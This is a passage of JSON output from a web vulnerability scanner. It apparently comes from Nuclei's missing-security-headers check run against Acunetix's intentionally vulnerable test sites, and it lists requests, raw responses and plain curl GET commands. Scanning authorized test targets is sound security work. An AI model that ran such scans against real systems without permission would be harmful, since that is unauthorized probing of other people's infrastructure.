style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9102')\\\" style=\\\"color:Black\\\" title=\\\"December 02\\\"\\u003e2\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9103')\\\" style=\\\"color:Black\\\" title=\\\"December 03\\\"\\u003e3\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9104')\\\" style=\\\"color:Black\\\" title=\\\"December 04\\\"\\u003e4\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9105')\\\" style=\\\"color:Black\\\" title=\\\"December 05\\\"\\u003e5\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9106')\\\" style=\\\"color:Black\\\" title=\\\"December 06\\\"\\u003e6\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9107')\\\" style=\\\"color:Black\\\" title=\\\"December 07\\\"\\u003e7\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\r\\n\\u003c/table\\u003e\\u003cBR\\u003e\\r\\n\\u003ca href=\\\"rssFeed.aspx\\\"\\u003eGet RSS feed\\u003c/a\\u003e\\r\\n\\u003c/TD\\u003e\\r\\n\\t\\t\\t\\t\\u003c/TR\\u003e\\r\\n\\t\\t\\t\\t\\u003cTR\\u003e\\r\\n\\t\\t\\t\\t\\t\\u003cTD colSpan=\\\"2\\\"\\u003e\\r\\n\\t\\t\\t\\t\\t\\u003c/TD\\u003e\\r\\n\\t\\t\\t\\t\\u003c/TR\\u003e\\r\\n\\t\\t\\t\\u003c/TABLE\\u003e\\r\\n\\t\\t\\u003c/form\\u003e\\r\\n\\t\\u003c/body\\u003e\\r\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px\\\"\\u003e\\r\\n\\t\\t\\u003cp style=\\\"padding-left:5%;padding-right:5%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.\\u003c/p\\u003e\\r\\n\\t\\u003c/div\\u003e\\r\\n\\u003c/HTML\\u003e\\r\\n\",\"ip\":\"44.238.29.244\",\"timestamp\":\"2024-11-13T02:41:02.569213666Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Safari/605.1.15' 'http://testaspnet.vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-permitted-cross-domain-policies\",\"type\":\"http\",\"host\":\"testasp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testasp.vulnweb.com/T\",\"path\":\"/T\",\"matched-at\":\"http://testasp.vulnweb.com/T/\",\"request\":\"GET /T HTTP/1.1\\r\\nHost: testasp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/604.1\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 403 Forbidden\\r\\nConnection: close\\r\\nContent-Length: 1233\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:40:46 GMT\\r\\nServer: Microsoft-IIS/8.5\\r\\nX-Powered-By: ASP.NET\\r\\n\\r\\n\\u003c!DOCTYPE html PUBLIC \\\"-//W3C//DTD XHTML 1.0 Strict//EN\\\" \\\"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\\\"\\u003e\\r\\n\\u003chtml xmlns=\\\"http://www.w3.org/1999/xhtml\\\"\\u003e\\r\\n\\u003chead\\u003e\\r\\n\\u003cmeta http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=iso-8859-1\\\"/\\u003e\\r\\n\\u003ctitle\\u003e403 - Forbidden: Access is denied.\\u003c/title\\u003e\\r\\n\\u003cstyle type=\\\"text/css\\\"\\u003e\\r\\n\\u003c!--\\r\\nbody{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}\\r\\nfieldset{padding:0 15px 10px 15px;} \\r\\nh1{font-size:2.4em;margin:0;color:#FFF;}\\r\\nh2{font-size:1.7em;margin:0;color:#CC0000;} \\r\\nh3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} \\r\\n#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:\\\"trebuchet MS\\\", Verdana, sans-serif;color:#FFF;\\r\\nbackground-color:#555555;}\\r\\n#content{margin:0 0 0 2%;position:relative;}\\r\\n.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}\\r\\n--\\u003e\\r\\n\\u003c/style\\u003e\\r\\n\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003cdiv id=\\\"header\\\"\\u003e\\u003ch1\\u003eServer Error\\u003c/h1\\u003e\\u003c/div\\u003e\\r\\n\\u003cdiv id=\\\"content\\\"\\u003e\\r\\n \\u003cdiv class=\\\"content-container\\\"\\u003e\\u003cfieldset\\u003e\\r\\n \\u003ch2\\u003e403 - Forbidden: Access is denied.\\u003c/h2\\u003e\\r\\n \\u003ch3\\u003eYou do not have permission to view this directory or page using the credentials that you supplied.\\u003c/h3\\u003e\\r\\n \\u003c/fieldset\\u003e\\u003c/div\\u003e\\r\\n\\u003c/div\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.238.29.244\",\"timestamp\":\"2024-11-13T02:41:02.992325551Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/604.1' 'http://testasp.vulnweb.com/T'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-frame-options\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/.carousel\",\"path\":\"/.carousel\",\"matched-at\":\"http://testhtml5.vulnweb.com/.carousel\",\"request\":\"GET /.carousel HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36 Edg/88.0.705.50\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 NOT FOUND\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 3.2 Final//EN\\\"\\u003e\\n\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\n\\u003ch1\\u003eNot Found\\u003c/h1\\u003e\\n\\u003cp\\u003eThe requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.\\u003c/p\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:03.135787656Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36 Edg/88.0.705.50' 'http://testhtml5.vulnweb.com/.carousel'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-resource-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/CVS/Repository\",\"path\":\"/CVS/Repository\",\"matched-at\":\"http://testphp.vulnweb.com/CVS/Repository\",\"request\":\"GET /CVS/Repository HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.203\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 8\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:40:56 GMT\\r\\nEtag: \\\"4dca64a4-8\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\nacupart\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:03.135843041Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.203' 'http://testphp.vulnweb.com/CVS/Repository'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-opener-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/admin\",\"path\":\"/admin\",\"matched-at\":\"http://testhtml5.vulnweb.com/admin\",\"request\":\"GET /admin HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:123.0) Gecko/20100101 Firefox/123.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 308 PERMANENT REDIRECT\\r\\nConnection: close\\r\\nContent-Length: 253\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nLocation: http://localhost/admin/\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 3.2 Final//EN\\\"\\u003e\\n\\u003ctitle\\u003eRedirecting...\\u003c/title\\u003e\\n\\u003ch1\\u003eRedirecting...\\u003c/h1\\u003e\\n\\u003cp\\u003eYou should be redirected automatically to target URL: \\u003ca href=\\\"http://localhost/admin/\\\"\\u003ehttp://localhost/admin/\\u003c/a\\u003e. If not click the link.\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:03.135852576Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:123.0) Gecko/20100101 Firefox/123.0' 'http://testhtml5.vulnweb.com/admin'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"referrer-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/ajax/archive\",\"path\":\"/ajax/archive\",\"matched-at\":\"http://testhtml5.vulnweb.com/ajax/archive\",\"request\":\"GET /ajax/archive HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36 Edg/91.0.864.48\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 2\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n[]\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:03.135852402Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36 Edg/91.0.864.48' 'http://testhtml5.vulnweb.com/ajax/archive'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-opener-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:202\",\"path\":\"/static/app/libs/sessvars.js:202\",\"matched-at\":\"http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:202\",\"request\":\"GET /static/app/libs/sessvars.js:202 HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_16) AppleWebKit/561.9 (KHTML, like Gecko) Version/11.7.81 Safari/561.9\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:03.135861783Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_16) AppleWebKit/561.9 (KHTML, like Gecko) Version/11.7.81 Safari/561.9' 'http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:202'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-opener-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/login\",\"path\":\"/login\",\"matched-at\":\"http://testhtml5.vulnweb.com/login\",\"request\":\"GET /login HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 405 METHOD NOT ALLOWED\\r\\nConnection: close\\r\\nContent-Length: 178\\r\\nAllow: POST, OPTIONS\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 3.2 Final//EN\\\"\\u003e\\n\\u003ctitle\\u003e405 Method Not Allowed\\u003c/title\\u003e\\n\\u003ch1\\u003eMethod Not Allowed\\u003c/h1\\u003e\\n\\u003cp\\u003eThe method is not allowed for the requested URL.\\u003c/p\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:03.135868705Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0' 'http://testhtml5.vulnweb.com/login'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"clear-site-data\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/comment\",\"path\":\"/comment\",\"matched-at\":\"http://testhtml5.vulnweb.com/comment\",\"request\":\"GET /comment HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html\\u003e\\n\\u003chtml lang=\\\"en\\\" xmlns=\\\"http://www.w3.org/1999/html\\\" data-ng-app=\\\"itemsApp\\\"\\u003e\\n\\u003chead\\u003e\\n \\u003cmeta charset=\\\"utf-8\\\"\\u003e\\n \\u003ctitle\\u003eSecurityTweets\\u003c/title\\u003e\\n \\u003cmeta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"\\u003e\\n \\u003cmeta name=\\\"description\\\" content=\\\"\\\"\\u003e\\n \\u003cmeta name=\\\"author\\\" content=\\\"\\\"\\u003e\\n\\n \\u003c!-- Le styles --\\u003e\\n \\u003clink href=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003c!--\\u003clink href=\\\"http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css\\\" rel=\\\"stylesheet\\\"\\u003e--\\u003e\\n \\u003clink href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'\\u003e\\n \\u003clink href=\\\"/static/css/style.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003cstyle type=\\\"text/css\\\"\\u003e\\n body {\\n padding-top: 60px;\\n padding-bottom: 40px;\\n }\\n .sidebar-nav {\\n padding: 9px 0;\\n }\\n\\n @media (max-width: 980px) {\\n /* Enable use of floated navbar text */\\n .navbar-text.pull-right {\\n float: none;\\n padding-left: 5px;\\n padding-right: 5px;\\n }\\n }\\n \\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\n\\u003cbody\\u003e\\n\\n\\u003cdiv class=\\\"navbar navbar-fixed-top\\\"\\u003e\\n \\u003cdiv class=\\\"navbar-inner\\\"\\u003e\\n \\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"btn btn-navbar\\\" data-toggle=\\\"collapse\\\" data-target=\\\".nav-collapse\\\"\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003c/button\\u003e\\n \\u003ca class=\\\"brand\\\" href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"/static/img/logo2.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u003c/a\\u003e\\n \\u003cp class=\\\"navbar-text pull-left\\\"\\u003e\\n HTML5 test website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\n \\u003c/p\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"span2\\\"\\u003e\\n \\u003cdiv class=\\\"well sidebar-nav\\\"\\u003e\\n \\u003cul class=\\\"nav nav-list\\\"\\u003e\\n \\u003cli class=\\\"nav-header\\\"\\u003eAction\\u003c/li\\u003e\\n \\u003cli class=\\\"active\\\"\\u003e\\u003ca href=\\\"#/response\\\"\\u003eResponse\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eAcunetix\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/\\\"\\u003eWebsite\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/html5-website-security/\\\"\\u003eHTML5 scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/\\\"\\u003eHTML5 vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/blog/\\\"\\u003eBlog\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.facebook.com/Acunetix\\\"\\u003eFacebook\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.twitter.com/acunetix/\\\"\\u003eTwitter\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n \\u003c/div\\u003e\\u003c!--/.well --\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003cdiv class=\\\"span10\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\n Sorry, but commenting is currently disabled! \\u003c!-- invalid --\\u003e\\n \\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n\\n \\u003chr\\u003e\\n\\t\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:14px\\\"\\u003e\\n\\t\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.\\u003c/p\\u003e\\n\\t\\u003c/div\\u003e\\n\\n \\u003cfooter\\u003e\\n 